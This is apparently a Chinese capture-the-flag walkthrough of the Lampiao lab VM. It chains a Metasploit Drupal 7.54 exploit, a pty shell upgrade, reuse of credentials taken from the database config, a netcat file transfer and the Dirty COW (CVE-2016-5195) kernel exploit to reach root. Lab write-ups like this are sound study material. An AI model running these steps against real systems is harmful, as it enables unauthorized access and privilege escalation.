发现开发了22、80、1898端口
dirb http://192.168.103.179:1898
发现版本是 Drupal 7.54, 2017-02-01
use 4
set RHOTS 192.168.103.179
set RPORT 1898
run #运行
shell #shell连接
python -c 'import pty; pty.spawn("/bin/bash")' #交互式shell
'username' => 'drupaluser',
'password' => 'Virgulino',
就只有一个账户,所以猜测数据库的密码就是账户的密码
账户:tiago
密码:Virgulino
漏洞描述
漏洞编号:CVE-2016-5195
漏洞名称:脏牛(Dirty COW)
漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权
影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。
┌──(rootkali)-[~]
└─# tar -czvf dcow.tar.gz CVE-2016-5195-master.zip
CVE-2016-5195-master.zip
通过uname -a 命令,查看内核版本,这里内核版本为4.4.0-31-ubuntu
主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞
1 Centos7 /RHEL7 3.10.0-327.36.3.el7
2 Cetnos6/RHEL6 2.6.32-642.6.2.el6
3 Ubuntu 16.10 4.8.0-26.28
4 Ubuntu 16.04 4.4.0-45.66
5 Ubuntu 14.04 3.13.0-100.147
6 Debian 8 3.16.36-1+deb8u2
7 Debian 7 3.2.82-1
tiago@lampiao:~$ nc -l 4444 > dcow.tar.gz
┌──(rootkali)-[~]
└─# nc 192.168.103.179 4444 < dcow.tar.gz
上传成功后,在靶机上面解压文件
切换到CVE-2016-5195-master目录后
make
多了一个dcow文件
./dcow #拿到root密码